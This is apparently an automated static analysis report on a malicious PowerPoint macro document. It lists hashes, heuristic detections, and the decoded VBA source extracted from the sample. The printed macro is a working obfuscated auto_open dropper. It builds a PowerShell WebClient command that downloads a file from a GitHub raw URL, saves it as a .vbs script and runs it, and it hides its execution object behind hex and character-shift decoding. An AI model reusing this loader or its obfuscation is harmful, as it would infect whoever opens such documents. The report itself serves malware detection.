Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5b94d79838bfe785…

MALICIOUS

Office (OOXML)

13.6 KB First seen: 2021-02-23
MD5: 3bc9f1801caffbca619b42b7fb89faa0 SHA-1: 3612bccb39ad23fdc99e9c740c07fec9803d8788 SHA-256: 5b94d79838bfe785c92838682e0d7edfd541e74083b2b133b6b7f0c77649caae
230 Risk Score

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPER
    The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.
    Matched line in script
    Sub auto_open()
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set pMxjFuP = GetObject(baFhJMAOy())
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set pMxjFuP = GetObject(baFhJMAOy())
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://raw.githubusercontent.com/farao151e/s/main/fevereiro.jpg��� In document text (OOXML body / shared strings)
    • https://raw.githubusercontent.com/farao151e/s/main/fevereiro.jpg�In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3019 bytes
SHA-256: f8304c1e9a5e4a5614271a01446ce29cd146320197c958629af9be89be34a58f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Módulo1"


Sub auto_open()

On Error Resume Next





boloteia = gbyDNiUmZV()

End Sub








Function DBKuOoh()
DBKuOoh = "hs" + "re"
End Function


Function gbyDNiUmZV()
'VBvPcFXclnCC = Array(kgUHXlR(QgjxziNx()), kgUHXlR(rnsQt()))






fd780 = Array("l", "le", DBKuOoh(), "wo", "P")

hgf8 = Join(fd780, "")









  

  Dim lll As String
  lll = "c"
  



unbmyajjzms = "(NEw-objE" & lll & "t " & "system.net.wEBclIenT).DownLoAdfIlE" & "( ”https://raw.githubusercontent.com/farao151e/s/main/fevereiro.jpg” , ”$ENv:public\pandorinha.vbs” ) ; stARt-PRoCESs ”$ENv:public\pandorinha.vbs”"


'geTpUk (unbmyajjzms)
'qcydwyqnozj (kgUHXlR(hgf8) & Space(1) & a)



geTpUk (kgUHXlR(hgf8) & Space(1) & unbmyajjzms)

End Function

'=====================================================================
'Begin Code
Function kgUHXlR(w7df0sd)
 Dim p
  For p = Len(w7df0sd) To 1 Step -1
      kgUHXlR = kgUHXlR & Mid(w7df0sd, p, 1)
  Next
End Function
Sub geTpUk(twe70)
If 473708283 = 473708283 + 1 Then End

Dim bARdSPJbYuep As String
Set pMxjFuP = GetObject(baFhJMAOy())
pMxjFuP.Run twe70, 0

End Sub
Function AttzfJHm()
If 510001701 = 510001701 + 1 Then End

Dim XvZFokZtj As Double
AttzfJHm = GNufAJd(decrypt(Hex2Str("4533443B"), Hex2Str("33")) + decrypt(Hex2Str("3D4C4E3C384B383835414A4C4935"), Hex2Str("38")) + decrypt(Hex2Str("3347343430334946"), Hex2Str("33")) + decrypt(Hex2Str("38343D394A4B3C"), Hex2Str("37")) + decrypt(Hex2Str("393F4C407D6B74"), Hex2Str("36")))

End Function
Function baFhJMAOy()
If 118835736 = 118835736 + 1 Then End

Dim iDWQGl As String
baFhJMAOy = GNufAJd(decrypt(Hex2Str("4B394A413E4D4F3D39"), Hex2Str("39")) + decrypt(Hex2Str("4532322F3B4446432F32"), Hex2Str("32")) + decrypt(Hex2Str("4A373733364C493733"), Hex2Str("36")) + decrypt(Hex2Str("3333444536343A473B78666F"), Hex2Str("31")))

End Function
Function GNufAJd(w7df0sd)
 Dim p
  For p = Len(w7df0sd) To 1 Step -1
If 172023426 = 172023426 + 1 Then End

Dim QSTYgWCLLK As Currency
      GNufAJd = GNufAJd & Mid(w7df0sd, p, 1)

  Next
End Function
Public Function decrypt(strInput As String, second As Integer)
    Dim first As Integer
    For first = 1 To Len(strInput)
If 218466674 = 218466674 + 1 Then End

Dim QgIHX As Currency
        Mid(strInput, first, 1) = Chr(Asc(Mid(strInput, first, 1)) - second)

    Next first
If 340325665 = 340325665 + 1 Then End

Dim TKYiRREE As Integer
    decrypt = strInput

End Function
Public Function Hex2Str(ByVal strData As String)
Dim second As Long, CryptString As String, tmpChar As String
    On Local Error Resume Next
    For second = 1 To Len(strData) Step 2
If 124270001 = 124270001 + 1 Then End

Dim XlHJScWA As Date
        CryptString = CryptString & Chr$(Val("&H" & Mid$(strData, second, 2)))

    Next second
If 567355800 = 567355800 + 1 Then End

Dim vbonEIKCbqi As Date
    Hex2Str = CryptString

End Function
vbaProject_00.bin vba-project OOXML VBA project: ppt/vbaProject.bin 32768 bytes
SHA-256: 26306d7544a1f7d12e98bdbdd99c1c17a9e373081f0f27ca15c2aded6a73814c